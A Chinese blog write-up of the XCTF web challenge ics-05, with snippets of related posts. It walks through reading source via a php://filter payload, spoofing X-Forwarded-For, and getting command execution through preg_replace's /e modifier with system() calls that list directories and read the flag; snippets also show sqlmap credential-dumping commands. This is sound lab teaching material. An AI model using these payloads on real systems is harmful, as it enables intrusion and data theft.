xctf-ics05

最新推荐文章于 2023-01-12 15:50:51 发布
最新推荐文章于 2023-01-12 15:50:51 发布
阅读量410 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Mars748/article/details/103034623
版权

xctf里面的一道web题ics05

这道题给了提示:其他破坏者会利用工控云管理系统设备维护中心的后门入侵系统
既然说了是设备维护中心的漏洞,打开设备维护中心,什么东西也没有,查看源码也没有啥东西。
这时候瞎点,点到了网页上面的导航上 云平台设备维护中心发现有变化。发现page的值会显示出来。
在这里插入图片描述
将page的参数改成index.php发现页面显示ok,改成其他的(比如flag.php)页面啥都没显示。
在这里插入图片描述
利用php伪协议获取index.php里面的内容
page=php://filter/read=convert.base64-encode/resource=index.php
即可读取index.php的内容
在这里插入图片描述
然后将获得的内容进行base64解密
得到源码

 <?php
error_reporting(0);

@session_start();
posix_setuid(1000);


?>
<!DOCTYPE HTML>
<html>

<head>
    <meta charset="utf-8">
    <meta name="renderer" content="webkit">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <link rel="stylesheet" href="layui/css/layui.css" media="all">
    <title>设备维护中心</title>
    <meta charset="utf-8">
</head>

<body>
    <ul class="layui-nav">
        <li class="layui-nav-item layui-this"><a href="?page=index">云平台设备维护中心</a></li>
    </ul>
    <fieldset class="layui-elem-field layui-field-title" style="margin-top: 30px;">
        <legend>设备列表</legend>
    </fieldset>
    <table class="layui-hide" id="test"></table>
    <script type="text/html" id="switchTpl">
        <!-- 这里的 checked 的状态只是演示 -->
        <input type="checkbox" name="sex" value="{{d.id}}" lay-skin="switch" lay-text="开|关" lay-filter="checkDemo" {{ d.id==1 0003 ? 'checked' : '' }}>
    </script>
    <script src="layui/layui.js" charset="utf-8"></script>
    <script>
    layui.use('table', function() {
        var table = layui.table,
            form = layui.form;

        table.render({
            elem: '#test',
            url: '/somrthing.json',
            cellMinWidth: 80,
            cols: [
                [
                    { type: 'numbers' },
                     { type: 'checkbox' },
                     { field: 'id', title: 'ID', width: 100, unresize: true, sort: true },
                     { field: 'name', title: '设备名', templet: '#nameTpl' },
                     { field: 'area', title: '区域' },
                     { field: 'status', title: '维护状态', minWidth: 120, sort: true },
                     { field: 'check', title: '设备开关', width: 85, templet: '#switchTpl', unresize: true }
                ]
            ],
            page: true
        });
    });
    </script>
    <script>
    layui.use('element', function() {
        var element = layui.element; //导航的hover效果、二级菜单等功能,需要依赖element模块
        //监听导航点击
        element.on('nav(demo)', function(elem) {
            //console.log(elem)
            layer.msg(elem.text());
        });
    });
    </script>

<?php

$page = $_GET[page];

if (isset($page)) {



if (ctype_alnum($page)) {
?>

    <br /><br /><br /><br />
    <div style="text-align:center">
        <p class="lead"><?php echo $page; die();?></p>
    <br /><br /><br /><br />

<?php

}else{

?>
        <br /><br /><br /><br />
        <div style="text-align:center">
            <p class="lead">
                <?php

                if (strpos($page, 'input') > 0) {
                    die();
                }

                if (strpos($page, 'ta:text') > 0) {
                    die();
                }

                if (strpos($page, 'text') > 0) {
                    die();
                }

                if ($page === 'index.php') {
                    die('Ok');
                }
                    include($page);
                    die();
                ?>
        </p>
        <br /><br /><br /><br />

<?php
}}


//方便的实现输入输出的功能,正在开发中的功能,只能内部人员测试

if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') {

    echo "<br >Welcome My Admin ! <br >";

    $pattern = $_GET[pat];
    $replacement = $_GET[rep];
    $subject = $_GET[sub];

    if (isset($pattern) && isset($replacement) && isset($subject)) {
        preg_replace($pattern, $replacement, $subject);
    }else{
        die();
    }

}





?>

</body>

</html>

源码太长,我们找到解题的关键部分代码

if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') {

    echo "<br >Welcome My Admin ! <br >";

    $pattern = $_GET[pat];
    $replacement = $_GET[rep];
    $subject = $_GET[sub];

    if (isset($pattern) && isset($replacement) && isset($subject)) {
        preg_replace($pattern, $replacement, $subject);
    }else{
        die();
    }

}

这里就是解题的关键部分了,简单的审计一下代码
要把自己的ip设置成127.0.0.1(可以直接在网页里将http头的X-Forwarded-For改为127.0.0.1)
还要给pat,rep,sub三个变量传值
PHP preg_replace()` 函数

mixed preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, int $limit = -1 [, int &$count ]] )
搜索 subject 中匹配 pattern 的部分, 以 replacement 进行替换。
参数说明:
$pattern: 要搜索的模式,可以是字符串或一个字符串数组。
$replacement: 用于替换的字符串或字符串数组。
$subject: 要搜索替换的目标字符串或字符串数组。
$limit: 可选,对于每个模式用于每个 subject 字符串的最大可替换次数。 默认是-1(无限制)。
$count: 可选,为替换执行的次数

这里显然还是无法解题,这个时候就要了解 preg_replace()*函数存在一个安全问题 :/e 修正符使 preg_replace()函数将replacement 参数当作 PHP 代码(在适当的逆向引用替换完之后)。提示:要确保 replacement 构成一个合法的 PHP 代码字符串,否则 PHP 会在报告在包含 preg_replace() 的行中出现语法解析错误。

比如我们本题构造?pat=/123/e&rep=phpinfo()&sub=123 就会触发phpinfo()的执行(此时的ip是127.0.0.1)
在这里插入图片描述
在这里插入图片描述

点击响应就可以看到phpinfo()这个代码执行了

同样的道理,我们把phpinfo()改成其他的php代码就行了(都要用127.0.0.1这个ip)

?pat=/123/e&rep=system("ls")&sub=123

在这里插入图片描述

?pat=/123/e&rep=system("cd s3chahahaDir;ls -la")&sub=123

在这里插入图片描述

?pat=/123/e&rep=system("cd s3chahahaDir/flag;ls -la")&sub=123

在这里插入图片描述

?pat=/123/e&rep=system("cat s3chahahaDir/flag/flag.php")&sub=123

在这里插入图片描述
flag就找到了

横眉冷对
关注
【网络安全 | XCTF】攻防世界 ics-05 解题详析
等风来
05-31 3803
题目描述:其他破坏者会利用工控云管理系统设备维护中心的后门入侵系统。在当前目录及其子目录中查找文件名中包含 xx 的文件,如。构造Payload如下,实现将sub中的。根据提示,进入维护中心页面。查看源代码 发现注入点。
xctf ics-02
weixin_51861515的博客
11-07 279
访问网址,打开文档中心,查看源代码。 发现 secure/default.php(没啥用) 和<a href="download.php?dl=ssrf">paper. </a> 会下载一个download.php文件。(浏览器的自解码机制,a标签的href属性会进行URL解码)。 打开看一下 没啥有用的信息。 可以用的信息太少了,dirsearch扫一下。 访问secret/ secret.php是一个注册页面,secret_deb...
XCTF训练之ics-05
RoboTerh的博客
08-05 257
XCTF ics-05 打开题目,我们发现只有“设备维护中心”可以进入 又发现点击“云平台设备维护中心”页面多了indexurl中多了page=index 查看源码,发现没有什么有用的东西 想到通过php伪协议获取index.php的源码不懂PHP伪协议点我!! payload:?php://filter/convert.base64-encode/resource=index.php 得到源码: base64解码后得到关键php代码: <?php error_reporting(0); @s
XCTF-ics-05
臭nana的博客
12-09 331
打开题目,根据题目提示找到设备维护中心 点进去(其他点了都没用),没发现什么有用的东西 点击了云平台设备维护中心后,发现url后面多了点东西,页面上也多了点东西,这里就是突破口 随便改一下page后面传入的值,发现后面的东西会被打印在页面上,尝试php伪协议,构造payload如下 page=php://filter/read=convert.base64-encode/r...
xctf(web)-ics-05
i_am_not_hacker的博客
08-08 925
本题的题目描述如下图所示,查看“设备维护中心” 再查看源码,也没有找到线索,通过php伪协议查看源码 php伪协议参考文章 在题目所给的url后加 ?page=php://filter/convert.base64-encode/resource=index.php 即可查到base64加密后的源码 base64解码后,查看代码,发现后门 //方便的实现输入输出的功能,正在开发中的功能,只能内部...
xctf ics-05 wp
doudoudedi
06-18 2730
今天刚考完数据库就来刷体了很累所以做了很久 诶还是不够仔细啊没有认真的做出来 应该直接想到任意文件读取的诶 page=php://filter/read=convert.base64-encode/resource=index.php 爆出源码: <?php error_reporting(0); @session_start(); posix_setui...
XCTF的ics-07
小白渣的博客
10-28 2301
三种解题方法 (1) 步骤 1.进入题目后,查看源码进行审计,第一步需要进行绕过,获取到admin的session。 2.绕过要注意的三个点为: ​ (1)floatval($ _ GET [id])!==‘1’ //浮点不为1 ​ (2)substr($ _ GET [id],-1)==='9‘ //id最后一位为9 ​ (3)Mysql查询结果限制,id不能过大, 3.构建后exp为http:...
web-ics-05
最新发布
07-28
对于题目"web-ics-05",根据提供的引用内容,我们可以得到以下信息: - 这道题可能是在入侵后利用管理平台来完成一些信息的收集,读取文件并利用是非常重要的。\[1\] - 在源代码中有一段注释,提到要给HTTP头部添加X...
XCTF攻防世界题目ics-04(XCTF 4th-CyberEarth)
daqiangdetianxia的博客
08-18 479
为了避免眼高手低,能用手工我决定把一些题目的详细思路和思考过程写一遍。就当是总结吧。 简单的一道sql注入题目加一个简单的逻辑漏洞。 信息搜集 页面:login.php,register.php,findpwd.php 服务器:Apache/2.4.7 (Ubuntu) ICS工业控制系统 漏洞查找 一、 经过测试,发现findpwd页面存在sql注入漏洞 二、手工注入 1.确定列数 admin1' order by 4#经过测试,一共有四列,其中admin1是我自己注册的用户。 2.确定注入列数. .
XCTF ics-05
小白渣的博客
10-01 594
题目来源 攻防世界web高手进阶区ics-05(XCTF 4th-CyberEarth) 1.拿到题目以后,发现是一个index.php的页面,并且设备…没有显示完全,此位置可疑。 2.源代码中发现?page=index,出现page这个get参数,联想到可能存在文件包含读源码的漏洞,尝试读取index.php的页面源码 通过php内置协议直接读取代码 /index.php?page=php://...
攻防世界XCTF:ics-05
末初的CSDN博客
03-06 1321
根据提示来到设备维护中心 查看源码可以发现这里隐藏了个超链接变量传参,看到变量传参,有可能存在文件包含漏洞读取源码,然后这个站又是php的站,那么使用php伪协议读取源码: ?page=php://filter/read=convert.base64-encode/resource=index.php 出现了base64编码过的源码,使用base64解码后源码如下: <?php err...
XCTF web ics-05
H4ppyD0g的博客
09-06 314
preg_replace() 函数执行一个正则表达式的搜索和替换。 mixed preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, int $limit = -1 [, int &$count ]] ) 搜索 subject 中匹配 pattern 的部分, 以 replacement 进行替换。 ...
XCTF:ics-05
Keepb1ue的博客
01-12 1438
php伪协议 + preg_replace+/e修正符命令执行
攻防世界(XCTF)ics-05 wp
qq_43399979的博客
09-05 437
到处点点看,发现会出现?page参数 因为index参数的存在,怀疑这里存在文件包含漏洞,经过几次尝试之后发现存在任意文件读取漏洞,用filter伪协议爆出了index.php。 page=php://filter/read=convert.base64-encode/resource=index.php 代码如下: <?php error_reporting(0); @sessi...
xctf_web ics-05
fly夏天的博客
09-23 575
刚打开网站 点击各个按钮发现除了一个index页面,没有别的变化。 尝试扫描,没扫出东西,看来问题就在这个index页面上了 这里我尝试查看了源码,并没有发现啥有用的东西。 只有一个可传参的参数page。 拜读了大佬的攻略,才发现可以利用文件读写漏洞读取源码。 page=php://filter/read=convert.base64-encode/resource=index.p...
XCTF-攻防世界CTF平台-Web类——17、ics-05(php://filter 协议、preg_replace函数命令执行)
Onlyone_1314的博客
01-01 2942
查看题目: 提示:其他破坏者会利用工控云管理系统设备维护中心的后门入侵系统,可能和后门程序有关,位置在工控云管理系统的设备维护中心 打开题目地址: 查看页面源代码: 只有设备维护中心的链接点击会跳转到index.php: 显示:数据接口请求异常 再查看index.php的源代码: 在云平台设备维护中心处有一个链接?page=index 点击之后: 它以GET方式提交page变量的值为index,后端index.php处理之后返回index。 传入page=123456,返回123456 所以我
攻防世界web高手进阶区ics-05(XCTF 4th-CyberEarth)WriteUp
D-R0s1的博客
08-04 5038
解题部分 题目来源 攻防世界web高手进阶区ics-05(XCTF 4th-CyberEarth) 1.拿到题目以后,发现是一个index.php的页面,并且设备…没有显示完全,此位置可疑。 2.源代码中发现?page=index,出现page这个get参数,联想到可能存在文件包含读源码的漏洞,尝试读取index.php的页面源码 通过php内置协议直接读取代码 /index.php?page=p...
XCTF-ics-07
臭nana的博客
12-17 463
题目描述:工控云管理系统项目管理页面解析漏洞 打开题目网址,点击项目管理 进来之后,发现页面下方有一个view-source 点击之后得到页面源码 <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>cetc7</title&...
XCTF-高手进阶区:ics-04
1stPeak's Blog
04-12 424
题目: 解题思路: 注入点在忘记密码处,使用sqlmap一把梭 sqlmap -r 1.txt --dbs --batch sqlmap -r 1.txt --dbs --batch -D cetc004 -T user -C 'username,password' --dump 直接解密md5,解密网址:https://www.somd5.com/ 然后使用c3tlwDmIn23登录,即可...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值